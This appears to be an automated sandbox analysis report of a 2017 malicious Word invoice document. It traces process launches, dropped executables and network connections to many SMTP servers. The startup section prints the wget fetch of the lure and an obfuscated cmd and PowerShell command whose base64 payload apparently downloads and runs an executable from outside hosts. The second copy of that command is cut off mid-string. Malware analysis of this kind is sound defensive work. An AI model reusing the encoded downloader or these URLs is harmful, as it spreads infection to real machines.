Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.Management\2.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.ServiceProcess\2.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.ServiceProcess\2.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.DirectoryServices\2.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.DirectoryServices\2.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.Configuration\2.0.0.0__b03f5f7f11d50a3a\System.configuration.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.Configuration\2.0.0.0__b03f5f7f11d50a3a\System.configuration.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user~1\AppData\Local\Temp\16994.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\helphome.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\LLocMy8gfC0E0xG3.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\helphome.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\helphome.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\helphome.exeQueries volume information: C:\ VolumeInformation

Behavior Graph

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
behavior_graph main Behavior Graph ID: 389575 Sample:   Startdate:  17/10/2017 Architecture:  WINDOWS Score:  100 0reduced Processes exeeded maximum capacity for this level. 2 processes have been hidden. main->0reduced      started     0 wget.exe 1 main->0      started     3 WINWORD.EXE 71 25 main->3      started     10 helphome.exe main->10      started     14 helphome.exe main->14      started     1253reducedSig Signatures exceeded maximum capacity for this level. 2 signatures have been hidden. 38610reducedSig Signatures exceeded maximum capacity for this level. 6 signatures have been hidden. 38614reducedSig Signatures exceeded maximum capacity for this level. 6 signatures have been hidden. 1253sig Injects files into Windows application 38610sig Drops executables to the windows directory (C:\Windows) and starts them 38614sig Drops executables to the windows directory (C:\Windows) and starts them 6434reducedSig Signatures exceeded maximum capacity for this level. 2 signatures have been hidden. 38611reducedSig Signatures exceeded maximum capacity for this level. 7 signatures have been hidden. 38615reducedSig Signatures exceeded maximum capacity for this level. 7 signatures have been hidden. 6434sig Encrypted powershell cmdline option found 38611sig Drops executables to the windows directory (C:\Windows) and starts them 38615sig Drops executables to the windows directory (C:\Windows) and starts them 522d1e551242sig Detected TCP or UDP traffic on non-standard ports 522d1e551243sig Detected TCP or UDP traffic on non-standard ports 522d1e551245sig Detected TCP or UDP traffic on non-standard ports 522d1e551249sig Detected TCP or UDP traffic on non-standard ports 522d1e551252sig Detected TCP or UDP traffic on non-standard ports 522d1e551254sig Detected TCP or UDP traffic on non-standard ports 522d1e551255sig Detected TCP or UDP traffic on non-standard ports 522d1e551257sig Detected TCP or UDP traffic on non-standard ports 522d1e551258sig Detected TCP or UDP traffic on non-standard ports 522d1e551260sig Detected TCP or UDP traffic on non-standard ports 522d1e551265sig Detected TCP or UDP traffic on non-standard ports 522d1e551269sig Detected TCP or UDP traffic on non-standard ports 522d1e551273sig Detected TCP or UDP traffic on non-standard ports 522d1e551274sig Detected TCP or UDP traffic on non-standard ports 522d1e551276sig Detected TCP or UDP traffic on non-standard ports 522d1e551279sig Detected TCP or UDP traffic on non-standard ports 522d1e551280sig Detected TCP or UDP traffic on non-standard ports 522d1e551281sig Detected TCP or UDP traffic on non-standard ports 522d1e551284sig Detected TCP or UDP traffic on non-standard ports 522d1e551285sig Detected TCP or UDP traffic on non-standard ports 38617reducedSig Signatures exceeded maximum capacity for this level. 6 signatures have been hidden. 38618reducedSig Signatures exceeded maximum capacity for this level. 6 signatures have been hidden. 38619reducedSig Signatures exceeded maximum capacity for this level. 6 signatures have been hidden. 6067sig System process connects to network (likely due to code injection or exploit) 38612sig Drops executables to the windows directory (C:\Windows) and starts them 38617sig Drops executables to the windows directory (C:\Windows) and starts them 38618sig Drops executables to the windows directory (C:\Windows) and starts them 38619sig Drops executables to the windows directory (C:\Windows) and starts them 38613sig Drops executables to the windows directory (C:\Windows) and starts them d1e551256 austinfilmschool.org 184.175.109.73, 80 CYBERCON-CYBERCONINCUS United States d1e453740 austinfilmschool.org d1e551236reduced Connected ips exeeded maximum capacity for this level. 67 connected ips have been hidden. d1e551242 smtp.gmail.com 74.125.205.108, 465 GOOGLE-GoogleIncUS United States d1e551242->522d1e551242sig d1e551243 dug-service.de 81.169.145.164, 587 STRATOSTRATOAGDE Germany d1e551243->522d1e551243sig d1e551245 patricia.xoc.tele2net.at 213.90.36.9, 587 UTA-ASAT Austria d1e551245->522d1e551245sig d1e551249 smtpout.secureserver.net 173.201.192.101, 3535 AS-26496-GO-DADDY-COM-LLC-GoDaddycomLLCUS United States d1e551249->522d1e551249sig d1e551252 pop.loomes.net 217.119.50.35, 587 PLUSSERVER-ASDE Germany d1e551252->522d1e551252sig d1e551254 smtp.liwest.at 212.33.55.20, 587 LIWEST-ATLinzAustriaAT Austria d1e551254->522d1e551254sig d1e551255 lb-proxy-16.websupport.sk 37.9.169.18, 587 WEBSUPPORT-SRO-SK-ASSK Slovakia (SLOVAK Republic) d1e551255->522d1e551255sig d1e551257 host4.ssl-gesichert.at 213.145.228.17, 587 DOMAINTECHNIKAT Austria d1e551257->522d1e551257sig d1e551258 zobelei.de 85.13.152.217, 587 NMM-ASD-02742Friedersdorf_Hauptstrasse68DE Germany d1e551258->522d1e551258sig d1e551260 virtual1.mx.freenet.de 195.4.92.211, 587 FREENETDEfreenetDatenkommunikationsGmbHDE Germany d1e551260->522d1e551260sig d1e551265 smtp.live.com 40.101.48.82, 587 MICROSOFT-CORP-MSN-AS-BLOCK-MicrosoftCorporationUS United States d1e551265->522d1e551265sig d1e551269 smtp.world4you.com 81.19.149.200, 587 WORLD4YOUAT Austria d1e551269->522d1e551269sig d1e551273 mailc40.carrierzone.com 64.29.151.235, 587 INFB2-AS-InternetNamesForBusinesscomUS United States d1e551273->522d1e551273sig d1e551274 ssl0.ovh.net 213.186.33.20, 587 OVHFR France d1e551274->522d1e551274sig d1e551276 w00b4087.kasserver.com 85.13.134.71, 587 NMM-ASD-02742Friedersdorf_Hauptstrasse68DE Germany d1e551276->522d1e551276sig d1e551279 ns0.ovh.net 213.186.33.155, 587 OVHFR France d1e551279->522d1e551279sig d1e551280 smtp.wp.pl 212.77.101.1, 587 WIRTUALNAPOLSKAGDANSKPolandPL Poland d1e551280->522d1e551280sig d1e551281 send.one.com 91.198.169.21, 587 ONECOMDK Denmark d1e551281->522d1e551281sig d1e551284 mail.active24.pl 195.78.67.24, 587 ACTIVE24-ASPL Poland d1e551284->522d1e551284sig d1e551285 star.gd-net.pl 195.250.38.66, 587 OK360PL Poland d1e551285->522d1e551285sig d1e551253 5.196.73.150, 443 OVHFR France d1e551286 zlc-aa.org 209.59.172.114, 80 LIQUID-WEB-INC-LiquidWebLLCUS United States d1e453799 zlc-aa.org d1e246223 16994.exe, PE32 0->d1e551256 0->d1e453740 3->1253reducedSig 3->1253sig 4 cmd.exe 3->4      started     10->38610reducedSig 10->38610sig 11 helphome.exe 10 10->11      started     14->38614reducedSig 14->38614sig 15 helphome.exe 14->15      started     4->6434reducedSig 4->6434sig 7 powershell.exe 12 7 4->7      started     11->38611reducedSig 11->38611sig 11->d1e551253 12 LLocMy8gfC0E0xG3.ex... 11->12      started     15->38615reducedSig 15->38615sig 15->d1e551236reduced 15->d1e551242 15->d1e551243 15->d1e551245 15->d1e551249 15->d1e551252 15->d1e551254 15->d1e551255 15->d1e551257 15->d1e551258 15->d1e551260 15->d1e551265 15->d1e551269 15->d1e551273 15->d1e551274 15->d1e551276 15->d1e551279 15->d1e551280 15->d1e551281 15->d1e551284 15->d1e551285 17 helphome.exe 15->17      started     18 helphome.exe 15->18      started     19 helphome.exe 15->19      started     7->6067sig 7->d1e551286 7->d1e453799 7->d1e246223 dropped 8 16994.exe 7->8      started     12->38612sig 13 LLocMy8gfC0E0xG3.ex... 12->13      started     17->38617reducedSig 17->38617sig 18->38618reducedSig 18->38618sig 19->38619reducedSig 19->38619sig 9 16994.exe 1 8->9      started     13->38613sig process0 dnsIp0 signatures0 process4 dnsIp4 signatures4 process7 dnsIp7 fileCreated7 signatures7 process8 signatures8 process9 fileCreated0 fileCreated4 fileCreated9

Simulations

Behavior and APIs

TimeTypeDescription
21:54:14API Interceptor1x Sleep call for process: WINWORD.EXE modified from: 60000ms to: 500ms
21:54:16API Interceptor2x Sleep call for process: WINWORD.EXE modified from: 30000ms to: 500ms
21:54:17API Interceptor1x Sleep call for process: OSPPSVC.EXE modified from: 300000ms to: 500ms
21:54:28API Interceptor2x Sleep call for process: powershell.exe modified from: 60000ms to: 500ms
21:54:40API Interceptor1x Sleep call for process: 16994.exe modified from: 60000ms to: 500ms
21:54:45API Interceptor2x Sleep call for process: helphome.exe modified from: 60000ms to: 500ms
21:54:50API Interceptor1x Sleep call for process: LLocMy8gfC0E0xG3.exe modified from: 60000ms to: 500ms
21:56:10API Interceptor2x Sleep call for process: WmiApSrv.exe modified from: 60000ms to: 500ms

Antivirus Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Domains

No Antivirus matches

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Unpacked PEs

No yara matches

Screenshot

windows-stand

Startup

  • System is w7_1
  • wget.exe (PID: 3308 cmdline: wget -T 60 -P 'C:\Users\user\Desktop\download' --no-check-certificate --content-disposition --user-agent='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko' 'austinfilmschool.org/Invoice-Dated-17-Oct-17-372510608/VR-AOFGB/2017/' MD5: 834C709455BFEFB9B0E8976BAD13A8F4)
  • WINWORD.EXE (PID: 3396 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /n 'C:\Users\user\Desktop\download\Client- 9650, Oct 2017 Invoice.doc MD5: 5D798FF0BE2A8970D932568068ACFD9D)
    • cmd.exe (PID: 3448 cmdline: cmd /V /C 'set %GhHTTCPpd%=p^owe^rs&&set %VzCLIMdnL%=he^ll&&!%GhHTTCPpd%!!%VzCLIMdnL%! -e IABJAEUAWAAgACgAKAAoADMANgAsACAAMQAxADkAIAAsADEAMQA1ACwAIAA5ADkAIAAsACAAMQAxADQALAAgADEAMAA1ACwAIAAxADEAMgAgACwAMQAxADYALAAzADIALAAgADYAMQAgACwAIAAzADIALAAgADEAMQAwACAALAAgADEAMAAxACwAIAAxADEAOQAgACwANAA1ACAALAAgADEAMQAxACwAIAA5ADgALAAxADAANgAsADEAMAAxACwAOQA5ACwAIAAxADEANgAgACwAIAAzADIALAA0ADUALAA2ADcALAAxADEAMQAsACAAMQAwADkAIAAsADcAOQAgACwAOQA4ACAALAAgADEAMAA2ACwAIAAxADAAMQAgACwAIAA5ADkALAAgADEAMQA2ACwAMwAyACAALAAgADgANwAsADgAMwAsACAAOQA5ACwAMQAxADQAIAAsACAAMQAwADUALAAgADEAMQAyACAALAAgADEAMQA2ACAALAA0ADYALAAgADgAMwAsADEAMAA0ACwAMQAwADEAIAAsADEAMAA4ACwAIAAxADAAOAAsADUAOQAgACwAIAAzADYALAAgADEAMQA5ACAALAAxADAAMQAsACAAOQA4ACAALAA5ADkAIAAsADEAMAA4ACwAMQAwADUALAAgADEAMAAxACAALAAxADEAMAAsADEAMQA2ACwAIAAzADIALAAgADYAMQAgACwAIAAzADIALAAgADEAMQAwACwAIAAxADAAMQAsACAAMQAxADkALAAgADQANQAgACwAIAAxADEAMQAgACwAOQA4ACAALAAxADAANgAgACwAIAAxADAAMQAgACwAOQA5ACAALAAxADEANgAsADMAMgAgACwAOAAzACAALAAxADIAMQAsADEAMQA1ACAALAAgADEAMQA2ACwAIAAxADAAMQAsACAAMQAwADkALAAgADQANgAsADcAOAAsADEAMAAxACwAIAAxADEANgAgACwAIAA0ADYAIAAsADgANwAsADEAMAAxACAALAAgADkAOAAsACAANgA3ACAALAAxADAAOAAsADEAMAA1ACAALAAxADAAMQAsACAAMQAxADAAIAAsADEAMQA2ACwAIAA1ADkAIAAsACAAMwA2ACAALAAgADEAMQA0ACAALAA5ADcALAAgADEAMQAwACwAMQAwADAALAAxADEAMQAsADEAMAA5ACAALAAgADMAMgAgACwAIAA2ADEALAAzADIAIAAsADEAMQAwACwAIAAxADAAMQAsADEAMQA5ACwAIAA0ADUALAAgADEAMQAxACwAIAA5ADgALAAgADEAMAA2ACwAIAAxADAAMQAgACwAOQA5ACAALAAgADEAMQA2ACAALAAgADMAMgAsADEAMQA0ACwAIAA5ADcALAAgADEAMQAwACwAMQAwADAAIAAsACAAMQAxADEALAAxADAAOQAgACwAIAA1ADkAIAAsACAAMwA2ACwAMQAxADcAIAAsACAAMQAxADQAIAAsADEAMAA4ACwAMQAxADUALAAzADIAIAAsADYAMQAgACwAIAAzADIALAAgADMAOQAgACwAMQAwADQALAAxADEANgAgACwAIAAxADEANgAsADEAMQAyACAALAA1ADgAIAAsACAANAA3ACwAIAA0ADcAIAAsADEAMgAyACwAIAAxADAAOAAgACwAIAA5ADkALAAgADQANQAsADkANwAgACwAOQA3ACwAIAA0ADYALAAgADEAMQAxACAALAAxADEANAAgACwAIAAxADAAMwAgACwAIAA0ADcALAAgADEAMQAwACwAMQAxADkAIAAsACAAOQA4ACAALAA2ADYALAA3ADQALAAgADgAMgAsADEAMQAwACAALAAxADAAMgAgACwAIAA0ADcAIAAsADQANAAgACwAMQAwADQALAAgADEAMQA2ACwAMQAxADYAIAAsACAAMQAxADIAIAAsADUAOAAgACwANAA3ACAALAAgADQANwAgACwAIAA1ADEAIAAsACAAOQA5ACAALAAgADEAMAAzACwAIAAxADAAMgAgACwAMQAyADAALAAgADQANgAgACwAIAA5ADkAIAAsADEAMQAxACAALAAxADAAOQAgACwAIAA0ADcAIAAsADEAMgAwACAALAA5ADcALAA4ADEAIAAsADQANwAsADQANAAgACwAMQAwADQAIAAsACAAMQAxADYAIAAsACAAMQAxADYAIAAsADEAMQAyACwAIAA1ADgAIAAsACAANAA3ACAALAAgADQANwAgACwAMQAxADQAIAAsADEAMAAxACwAIAAxADAANwAgACwAMQAwADEAIAAsACAAMQAxADAALAAgADQANQAgACwAIAA5ADgALAAgADEAMAA0ACwAMQAwADIALAA0ADYAIAAsACAAMQAwADAAIAAsACAAMQAwADEAIAAsACAANAA3ACwAIAA3ADYALAAxADAAMQAsADEAMQAwACAALAAgADEAMQA2ACAALAAxADAAMQAgACwAIAAxADEANAAgACwAIAA0ADkALAA0ADcAIAAsADEAMQA1ACAALAAgADEAMAA0ACwANwAwACAALAAxADEAOAAgACwAIAAxADIAMAAsADYANQAsADgANgAgACwAIAA2ADcAIAAsACAAMQAyADAAIAAsACAANAA3ACAALAA0ADQALAAxADAANAAsADEAMQA2ACAALAAgADEAMQA2ACAALAAgADEAMQAyACwAIAA1ADgALAAgADQANwAsACAANAA3ACAALAA5ADcAIAAsACAAMQAxADAALAAxADEANgAgACwAIAA5ADgALAAgADEAMAAxACwAOQA3ACAALAAxADEANAAgACwANAA2ACwAMQAwADAAIAAsACAAMQAwADEAIAAsACAANAA3ACAALAAgADEAMQAwACwAOQA4ACAALAAgADEAMQA0ACwAOQAwACwAMQAxADAALAAgADEAMQAzACAALAA0ADcALAA0ADQALAAxADAANAAgACwAMQAxADYALAAgADEAMQA2ACwAMQAxADIAIAAsADUAOAAsADQANwAgACwANAA3ACwAIAAxADEAMgAgACwAIAAxADEANAAsACAAOQA3ACAALAAgADEAMgAwACwAIAAxADAANQAsADEAMQA1ACwAIAAxADAAOAAgACwAMQAxADcAIAAsADEAMAA5ACAALAAgADEAMQAyACwAMQAxADIAIAAsADQANgAsACAAMQAwADAAIAAsACAAMQAwADEAIAAsADQANwAgACwANgA5ACwANwAyACwAIAAxADEAOQAgACwANAA3ACwAIAAzADkALAAgADQANgAgACwAOAAzACAALAAgADEAMQAyACwAIAAxADAAOAAgACwAIAAxADAANQAsACAAMQAxADYAIAAsACAANAAwACAALAAzADkALAA0ADQALAAgADMAOQAsADQAMQAsADUAOQAsACAAMwA2ACAALAAxADEAMAAgACwAOQA3ACAALAAxADAAOQAsACAAMQAwADEALAAzADIAIAAsADYAMQAgACwAMwAyACAALAAzADYAIAAsACAAMQAxADQAIAAsACAAOQA3ACwAMQAxADAAIAAsADEAMAAwACwAIAAxADEAMQAgACwAMQAwADkALAA0ADYAIAAsADEAMQAwACwAIAAxADAAMQAsADEAMgAwACAALAAxADEANgAgACwAIAA0ADAAIAAsADQAOQAsADQANAAsADMAMgAsACAANQA0ACwAIAA1ADMALAA1ADMAIAAsACAANQAxACAALAA1ADQALAAgADQAMQAgACwAIAA1ADkAIAAsACAAMwA2ACAALAAxADEAMgAgACwAOQA3ACwAMQAxADYALAAgADEAMAA0ACwAIAAzADIALAAgADYAMQAgACwAMwAyACAALAAgADMANgAgACwAMQAwADEALAAxADEAMAAsACAAMQAxADgAIAAsADUAOAAsACAAMQAxADYAIAAsADEAMAAxACwAIAAxADAAOQAsACAAMQAxADIALAAgADMAMgAgACwANAAzACwAMwAyACAALAAgADMAOQAsACAAOQAyACwAIAAzADkAIAAsADMAMgAsADQAMwAgACwAIAAzADIALAAzADYAIAAsACAAMQAxADAALAAgADkANwAsADEAMAA5ACAALAAxADAAMQAsADMAMgAgACwAIAA0ADMALAAzADIAIAAsACAAMwA5ACAALAAgADQANgAgACwAMQAwADEAIAAsADEAMgAwACAALAAxADAAMQAsADMAOQAsACAANQA5ACwAMQAwADIAIAAsACAAMQAxADEAIAAsACAAMQAxADQALAAxADAAMQAgACwAOQA3ACwAOQA5ACAALAAxADAANAAgACwAIAA0ADAAIAAsADMANgAgACwAMQAxADcAIAAsACAAMQAxADQAIAAsADEAMAA4ACwAIAAzADIAIAAsADEAMAA1ACAALAAxADEAMAAgACwAIAAzADIALAAzADYALAAgADEAMQA3ACAALAAxADEANAAgACwAIAAxADAAOAAgACwAIAAxADEANQAsADQAMQAgACwAMQAyADMAIAAsADEAMQA2ACAALAAgADEAMQA0ACAALAAgADEAMgAxACAALAAgADEAMgAzACwAMwA2ACwAIAAxADEAOQAgACwAIAAxADAAMQAgACwAIAA5ADgAIAAsADkAOQAsADEAMAA4ACAALAAxADAANQAgACwAMQAwADEAIAAsACAAMQAxADAAIAAsADEAMQA2ACwANAA2ACwANgA4ACwAMQAxADEALAAxADEAOQAgACwAIAAxADEAMAAgACwAMQAwADgAIAAsADEAMQAxACAALAA5ADcAIAAsACAAMQAwADAALAA3ADAALAAgADEAMAA1ACAALAAxADAAOAAgACwAIAAxADAAMQAgACwAIAA0ADAALAAzADYALAAgADEAMQA3ACwAMQAxADQAIAAsACAAMQAwADgAIAAsACAANAA2ACwAIAA4ADQALAAgADEAMQAxACAALAA4ADMAIAAsACAAMQAxADYAIAAsACAAMQAxADQALAAxADAANQAsADEAMQAwACwAIAAxADAAMwAsADQAMAAgACwAIAA0ADEALAA0ADQAIAAsADMAMgAgACwAIAAzADYALAAxADEAMgAsACAAOQA3ACwAMQAxADYAIAAsADEAMAA0ACAALAA0ADEAIAAsACAANQA5ACAALAAgADgAMwAsADEAMQA2ACwAIAA5ADcALAAgADEAMQA0ACAALAAxADEANgAsACAANAA1ACwAIAA4ADAAIAAsACAAMQAxADQALAAgADEAMQAxACwAIAA5ADkAIAAsADEAMAAxACwAIAAxADEANQAgACwAIAAxADEANQAsACAAMwAyACAALAAgADMANgAgACwAMQAxADIAIAAsADkANwAgACwAIAAxADEANgAsACAAMQAwADQALAA1ADkALAA5ADgAIAAsADEAMQA0ACAALAAgADEAMAAxACAALAA5ADcALAAxADAANwAgACwAIAA1ADkAIAAsACAAMQAyADUAIAAsADkAOQAgACwAOQA3ACwAIAAxADEANgAsACAAOQA5ACwAMQAwADQALAAgADEAMgAzACAALAAgADEAMQA5ACwAIAAxADEANAAsACAAMQAwADUAIAAsACAAMQAxADYAIAAsADEAMAAxACwAIAA0ADUAIAAsADEAMAA0ACwAMQAxADEAIAAsACAAMQAxADUAIAAsACAAMQAxADYALAAzADIALAAgADMANgAgACwAOQA1ACwAIAA0ADYAIAAsACAANgA5ACAALAAxADIAMAAgACwAIAA5ADkALAAxADAAMQAgACwAIAAxADEAMgAgACwAMQAxADYAIAAsACAAMQAwADUALAAxADEAMQAgACwAMQAxADAAIAAsACAANAA2ACwAIAA3ADcAIAAsADEAMAAxACAALAAxADEANQAgACwAIAAxADEANQAgACwAOQA3ACwAMQAwADMALAAxADAAMQAgACwANQA5ACAALAAxADIANQAsACAAMQAyADUAIAApACAAfAAgACUAIAB7ACAAKAAgAFsAQwBIAEEAUgBdAFsASQBOAHQAXQAgACQAXwApAH0AIAApACAALQBKAE8ASQBuACcAJwApAA== MD5: AD7B9C14083B52BC532FBA5948342B98)
      • powershell.exe (PID: 3488 cmdline: powershell -e IABJAEUAWAAgACgAKAAoADMANgAsACAAMQAxADkAIAAsADEAMQA1ACwAIAA5ADkAIAAsACAAMQAxADQALAAgADEAMAA1ACwAIAAxADEAMgAgACwAMQAxADYALAAzADIALAAgADYAMQAgACwAIAAzADIALAAgADEAMQAwACAALAAgADEAMAAxACwAIAAxADEAOQAgACwANAA1ACAALAAgADEAMQAxACwAIAA5ADgALAAxADAANgAsADEAMAAxACwAOQA5ACwAIAAxADEANgAgACwAIAAzADIALAA0ADUALAA2ADcALAAxADEAMQAsACAAMQAwADkAIAAsADcAOQAgACwAOQA4ACAALAAgADEAMAA2ACwAIAAxADAAMQAgACwAIAA5ADkALAAgADEAMQA2ACwAMwAyACAALAAgADgANwAsADgAMwAsACAAOQA5ACwAMQAxADQAIAAsACAAMQAwADUALAAgADEAMQAyACAALAAgADEAMQA2ACAALAA0ADYALAAgADgAMwAsADEAMAA0ACwAMQAwADEAIAAsADEAMAA4ACwAIAAxADAAOAAsADUAOQAgACwAIAAzADYALAAgADEAMQA5ACAALAAxADAAMQAsACAAOQA4ACAALAA5ADkAIAAsADEAMAA4ACwAMQAwADUALAAgADEAMAAxACAALAAxADEAMAAsADEAMQA2ACwAIAAzADIALAAgADYAMQAgACwAIAAzADIALAAgADEAMQAwACwAIAAxADAAMQAsACAAMQAxADkALAAgADQANQAgACwAIAAxADEAMQAgACwAOQA4ACAALAAxADAANgAgACwAIAAxADAAMQAgACwAOQA5ACAALAAxADEANgAsADMAMgAgACwAOAAzACAALAAxADIAMQAsADEAMQA1ACAALAAgADEAMQA2ACwAIAAxADAAMQAsACAAMQAwADkALAAgADQANgAsADcAOAAsADEAMAAxACwAIAAxADEANgAgACwAIAA0ADYAIAAsADgANwAsADEAMAAxACAALAAgADkAOAAsACAANgA3ACAALAAxADAAOAAsADEAMAA1ACAALAAxADAAMQAsACAAMQAxADAAIAAsADEAMQA2ACwAIAA1ADkAIAAsACAAMwA2ACAALAAgADEAMQA0ACAALAA5ADcALAAgADEAMQAwACwAMQAwADAALAAxADEAMQAsADEAMAA5ACAALAAgADMAMgAgACwAIAA2ADEALAAzADIAIAAsADEAMQAwACwAIAAxADAAMQAsADEAMQA5ACwAIAA0ADUALAAgADEAMQAxACwAIAA5ADgALAAgADEAMAA2ACwAIAAxADAAMQAgACwAOQA5ACAALAAgADEAMQA2ACAALAAgADMAMgAsADEAMQA0ACwAIAA5ADcALAAgADEAMQAwACwAMQAwADAAIAAsACAAMQAxADEALAAxADAAOQAgACwAIAA1ADkAIAAsACAAMwA2ACwAMQAxADcAIAAsACAAMQAxADQAIAAsADEAMAA4ACwAMQAxADUALAAzADIAIAAsADYAMQAgACwAIAAzADIALAAgADMAOQAgACwAMQAwADQALAAxADEANgAgACwAIAAxADEANgAsADEAMQAyACAALAA1ADgAIAAsACAANAA3ACwAIAA0ADcAIAAsADEAMgAyACwAIAAxADAAOAAgACwAIAA5ADkALAAgADQANQAsADkANwAgACwAOQA3ACwAIAA0ADYALAAgADEAMQAxACAALAAxADEANAAgACwAIAAxADAAMwAgACwAIAA0ADcALAAgADEAMQAwACwAMQAxADkAIAAsACAAOQA4ACAALAA2ADYALAA3ADQALAAgADgAMgAsADEAMQAwACAALAAxADAAMgAgACwAIAA0ADcAIAAsADQANAAgACwAMQAwADQALAAgADEAMQA2ACwAMQAxADYAIAAsACAAMQAxADIAIAAsADUAOAAgACwANAA3ACAALAAgADQANwAgACwAIAA1ADEAIAAsACAAOQA5ACAALAAgADEAMAAzACwAIAAxADAAMgAgACwAMQAyADAALAAgADQANgAgACwAIAA5ADkAIAAsADEAMQAxACAALAAxADAAOQAgACwAIAA0ADcAIAAsADEAMgAwACAALAA5ADcALAA4ADEAIAAsADQANwAsADQANAAgACwAMQAwADQAIAAsACAAMQAxADYAIAAsACAAMQAxADYAIAAsADEAMQAyACwAIAA1ADgAIAAsACAANAA3ACAALAAgADQANwAgACwAMQAxADQAIAAsADEAMAAxACwAIAAxADAANwAgACwAMQAwADEAIAAsACAAMQAxADAALAAgADQANQAgACwAIAA5ADgALAAgADEAMAA0ACwAMQAwADIALAA0ADYAIAAsACAAMQAwADAAIAAsACAAMQAwADEAIAAsACAANAA3ACwAIAA3ADYALAAxADAAMQAsADEAMQAwACAALAAgADEAMQA2ACAALAAxADAAMQAgACwAIAAxADEANAAgACwAIAA0ADkALAA0ADcAIAAsADEAMQA1ACAALAAgADEAMAA0ACwANwAwACAALAAxADEAOAAgACwAIAAxADIAMAAsADYANQAsADgANgAgACwAIAA2ADcAIAAsACAAMQAyADAAIAAsACAANAA3ACAALAA0ADQALAAxADAANAAsADEAMQA2ACAALAAgADEAMQA2ACAALAAgADEAMQAyACwAIAA1ADgALAAgADQANwAsACAANAA3ACAALAA5ADcAIAAsACAAMQAxADAALAAxADEANgAgACwAIAA5ADgALAAgADEAMAAxACwAOQA3ACAALAAxADEANAAgACwANAA2ACwAMQAwADAAIAAsACAAMQAwADEAIAAsACAANAA3ACAALAAgADEAMQAwACwAOQA4ACAALAAgADEAMQA0ACwAOQAwACwAMQAxADAALAAgADEAMQAzACAALAA0ADcALAA0ADQALAAxADAANAAgACwAMQAxADYALAAgADEAMQA2ACwAMQAxADIAIAAsADUAOAAsADQANwAgACwANAA3ACwAIAAxADEAMgAgACwAIAAxADEANAAsACAAOQA3ACAALAAgADEAMgAwACwAIAAxADAANQAsADEAMQA1ACwAIAAxADAAOAAgACwAMQAxADcAIAAsADEAMAA5ACAALAAgADEAMQAyACwAMQAxADIAIAAsADQANgAsACAAMQAwADAAIAAsACAAMQAwADEAIAAsADQANwAgACwANgA5ACwANwAyACwAIAAxADEAOQAgACwANAA3ACwAIAAzADkALAAgADQANgAgACwAOAAzACAALAAgADEAMQAyACwAIAAxADAAOAAgACwAIAAxADAANQAsACAAMQAxADYAIAAsACAANAAwACAALAAzADkALAA0ADQALAAgADMAOQAsADQAMQAsADUAOQAsACAAMwA2ACAALAAxADEAMAAgACwAOQA3ACAALAAxADAAOQAsACAAMQAwADEALAAzADIAIAAsADYAMQAgACwAMwAyACAALAAzADYAIAAsACAAMQAxADQAIAAsACAAOQA3ACwAMQAxADAAIAAsADEAMAAwACwAIAAxADEAMQAgACwAMQAwADkALAA0ADYAIAAsADEAMQAwACwAIAAxADAAMQAsADEAMgAwACAALAAxADEANgAgACwAIAA0ADAAIAAsADQAOQAsADQANAAsADMAMgAsACAANQA0ACwAIAA1ADMALAA1ADMAIAAsACAANQAxACAALAA1ADQALAAgADQAMQAgACwAIAA1ADkAIAAsACAAMwA2ACAALAAxADEAMgAgACwAOQA3ACwAMQAxADYALAAgADEAMAA0ACwAIAAzADIALAAgADYAMQAgACwAMwAyACAALAAgADMANgAgACwAMQAwADEALAAxADEAMAAsACAAMQAxADgAIAAsADUAOAAsACAAMQAxADYAIAAsADEAMAAxACwAIAAxADAAOQAsACAAMQAxADIALAAgADMAMgAgACwA